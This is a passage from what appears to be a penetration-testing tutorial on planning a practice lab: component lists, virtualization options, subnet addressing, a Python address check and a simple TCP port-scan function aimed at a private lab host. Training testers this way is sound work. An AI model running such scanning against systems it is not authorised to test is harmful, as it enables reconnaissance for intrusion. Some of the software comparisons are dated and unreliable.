be assessed. Determining the lab environment size: The number of various lab environment components should be defined in this phase. Determining the required resources: The point of this phase is to choose which hardware and software could be used for building the lab with the specified parameters and fit it with what you actually have or are able to get. Determining the lab environment architecture: This phase designs the network topology and network address space How to do it... 
Now, I want to describe step by step how to plan a common lab combining all three lab types listed in the preceding section, using the following four-phase approach:

Determine the lab environment requirements: To fit our goal and practise particular skills, the lab should contain the following components:

Skills to practise – necessary components:
Discovery techniques, enumeration techniques, scanning techniques, and network vulnerability exploitation – several different hosts with various OSs; a firewall; an IPS
OWASP TOP 10 vulnerabilities discovery and exploitation – a web server; a web application; a database server; a Web Application Firewall
Password and hash attacks – workstations; servers; a domain controller; an FTP server
Wireless attacks – a wireless router; a radius server; a laptop or any other host with a Wi-Fi adapter
Modifying and testing exploits – any host; a vulnerable network service; a debugger
Privilege escalation – any host
Tunnelling – several hosts
Fuzzing and vulnerability research – any host; a vulnerable network service; a debugger
Documenting the penetration testing process – specialized software

Now, we can make our component list and define the importance of each component for our lab (importance ranges from less important, Additional, to most important, Essential):

Windows server – Essential
Linux server – Important
FreeBSD server – Additional
Domain controller – Important
Web server – Essential
FTP server – Important
Web site – Essential
Web 2.0 application – Important
Web Application Firewall – Additional
Database server – Essential
Windows workstation – Essential
Linux workstation – Additional
Laptop or any other host with Wi-Fi adapter – Essential
Wireless router – Essential
Radius server – Important
Firewall – Important
IPS – Additional
Debugger – Additional

Determine the lab environment size: In this step, we decide how many instances of each component we need in our lab. We will count only the essential and important components, so let's exclude all additional ones. This leaves us with the following numbers:

Windows server – 2
Linux server – 1
Domain controller – 1
Web server – 1
FTP server – 1
Web site – 1
Web 2.0 application – 1
Database server – 1
Windows workstation – 2
Host with Wi-Fi adapter – 2
Wireless router – 1
Radius server – 1
Firewall – 2

Determine the required resources: Now, we will decide on the required resources:

Server and victim workstations will be virtual machines based on VMWare Workstation 8.0. To run the virtual machines without any trouble, you will need an appropriate hardware platform with a CPU with two or more cores and at least 4 GB of RAM.
Windows servers will run Microsoft Windows Server 2008 and Microsoft Windows Server 2003.
We will use Ubuntu 12.04 LTS as the Linux server OS.
Workstations will run Microsoft Windows XP SP3 and Microsoft Windows 7.
An ASUS WL-520gc will be used as the LAN and WLAN router.
Any laptop will serve as the attacker's host.
A Samsung Galaxy Tab (or any other device supporting Wi-Fi) will act as the Wi-Fi victim.
We will use free software for the web server, the FTP server, and the web application, so no additional hardware or financial resources are needed for these.

Determine the lab environment architecture: Now, we need to design our lab network and draw a scheme. The address space parameters are as follows:

DHCP server: 192.168.1.1
Gateway: 192.168.1.1
Address pool: 192.168.1.2-15
Subnet mask: 255.255.255.0

A short scripted sanity check of this addressing plan follows.
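The following minimal Python sketch (using the standard ipaddress module) simply encodes the subnet, gateway/DHCP address, and lease pool given above and runs a few basic checks on them. It is an illustrative assumption of how you might write the plan down, not part of the original recipe.

import ipaddress

# Addressing plan from the scheme above (a /24, per the 255.255.255.0 subnet mask)
lab_net = ipaddress.ip_network("192.168.1.0/24")
gateway = ipaddress.ip_address("192.168.1.1")  # also acts as the DHCP server
pool = [ipaddress.ip_address(f"192.168.1.{host}") for host in range(2, 16)]  # 192.168.1.2-15

# Basic sanity checks on the plan
assert gateway in lab_net
assert all(address in lab_net for address in pool)
assert gateway not in pool  # the gateway/DHCP address is excluded from the lease pool

print(f"Subnet: {lab_net}, gateway/DHCP: {gateway}, {len(pool)} addresses in the DHCP pool")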
How it works...

In the first step, we discovered which types of lab components we need by determining what could be used to practise the following skills:

All OSs and network services are suitable for practising discovery, enumeration, and scanning techniques, as well as network vulnerability exploitation (a minimal connect-scan sketch follows this section). We also need at least two firewalls – the Windows built-in software firewall and the router's built-in firewall functions. Firewalls are necessary for learning different scanning techniques and firewall rule detection. Additionally, you can use any IPS for practising evasion techniques.
A web server, a website, and a web application are necessary for learning how to discover and exploit OWASP TOP 10 vulnerabilities. Though a Web Application Firewall (WAF) is not necessary, it helps to take web penetration testing skills to a higher level.
An FTP service is ideal for practising password brute-forcing. Microsoft domain services are necessary to understand and try Windows domain password and hash attacks, including relaying. This is why we need at least one network service with remote password authentication and at least one Windows domain controller with two Windows workstations.
A wireless access point is essential for performing various wireless attacks, but it is better to combine the LAN router and Wi-Fi access point in one device, so we will use a Wi-Fi router with several LAN ports. A radius server is necessary for practising attacks on WLANs with WPA-Enterprise security. A laptop and a tablet PC with Wi-Fi adapters will act as the attacker and victim in wireless attacks.
Tunnelling techniques can be practised on any two hosts; it does not matter whether we use Windows or any other OS.
Testing and modifying exploits, as well as fuzzing and vulnerability research, need a debugger installed on a vulnerable host.
To properly document a penetration testing process, you can use any text processor software, but there are several specialized solutions that make things much more comfortable and easier.

In the second step, we determined which software and hardware we can use as instances of the chosen component types and set their importance, based on a common lab for a penetration tester of basic to intermediate professional level.

In the third step, we worked out which solutions are suitable for our tasks and what we can afford. I have tried to choose the cheaper option, which is why I am going to use virtualization software. The ASUS WL-520gc combines a LAN router and a Wi-Fi access point in the same device, so it is cheaper and more convenient than using dedicated devices. A laptop and a tablet PC are also chosen for practising wireless attacks, although that is not the cheapest solution.

In the fourth step, we designed our lab network based on the determined resources. We have chosen to put all the hosts in the same subnet to keep the lab setup simple. The subnet has its own DHCP server to dynamically assign network addresses to hosts.
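To make the first point concrete, here is a minimal sketch of the kind of scanning exercise these lab hosts are meant for: a plain TCP connect scan written in Python. The target address 192.168.1.10 and the port list are illustrative assumptions within the lab's address pool, not values prescribed by this recipe; in practice you would normally use a dedicated scanner such as Nmap.

import socket

def tcp_connect_scan(host, ports, timeout=0.5):
    """Return the list of ports that accept a TCP connection on the given host."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex() returns 0 when the TCP handshake succeeds
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    # 192.168.1.10 is a placeholder for one of the lab victims in the pool above
    print(tcp_connect_scan("192.168.1.10", [21, 22, 80, 443, 445, 3389]))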
There's more...

Let me give you an account of alternative ways to plan the lab environment details.

Lab environment components variations

It is not necessary to use a laptop as the attacker machine and a tablet PC as the victim – you just need two PCs with connected Wi-Fi adapters to perform various wireless attacks. As an alternative to virtual machines, a laptop, and a tablet PC, old unused computers (if you have them) can also be used as hardware hosts. There is only one condition – their hardware resources should be enough for the planned OSs to work.

An IPS can be either software or hardware, but hardware systems are more expensive. For our needs, it is enough to use any freeware Internet security suite that includes both firewall and IPS functionality.

It is not essential to choose the same OSs as I have chosen in this chapter; you can use any other OSs that support the required functionality. The same is true of network services – it is not necessary to use an FTP service; you can use any other service that supports network password authentication, such as telnet or SSH.

You will have to additionally install a debugger on one of the victim workstations if you need to test new or modified exploits and perform vulnerability research.

Finally, you can use any other hardware or virtual router that supports LAN routing and Wi-Fi access point functionality. A dedicated LAN router connected to a separate Wi-Fi access point is also suitable for the lab.

Choosing virtualization solutions – pros and cons

Here, I want to list some pros and cons of the different virtualization solutions:

VMWare ESXi
Pros: enterprise-grade, powerful solution; easily supports a lot of virtual machines on the same physical server as separate partitions; no need to install an underlying OS.
Cons: very high cost; requires a powerful server; requires processor virtualization support.

VMWare Workstation
Pros: comfortable to work with; user-friendly GUI; easy to install; virtual *nix systems work fast; works better with virtual graphics.
Cons: shareware; sometimes has problems with USB Wi-Fi adapters on Windows 7; demanding on system resources; does not support 64-bit guest OSs; virtual Windows systems work slowly.

VMWare Player
Pros: freeware; user-friendly GUI; easy to install.
Cons: cannot create new virtual machines; poor functionality.

Microsoft Virtual PC
Pros: freeware; great compatibility and stability with Microsoft systems; good USB support; easy to install.
Cons: works only on Windows and only with Windows; does not support a lot of features that competing solutions do.

Oracle VirtualBox
Pros: freeware; virtual Windows systems work fast; user-friendly GUI; easy to install; works on Mac OS and Solaris as well as on Windows and Linux; supports the "Teleportation" technology.
Cons: paid USB support; virtual *nix systems work slowly.

Here, I have listed only the leaders of the virtualization market, in my opinion. Historically, I am most accustomed to VMWare Workstation, but of course, you can choose any other solution that you may like. You can find more comparison info at http://virt.kernelnewbies.org/TechComparison.

Summary

This article explained how you can plan your lab environment.

Resources for Article :

Further resources on this subject:

FAQs on BackTrack 4 [Article]

CISSP: Vulnerability and Penetration Testing for Access Control [Article]

BackTrack 4: Target Scoping [Article]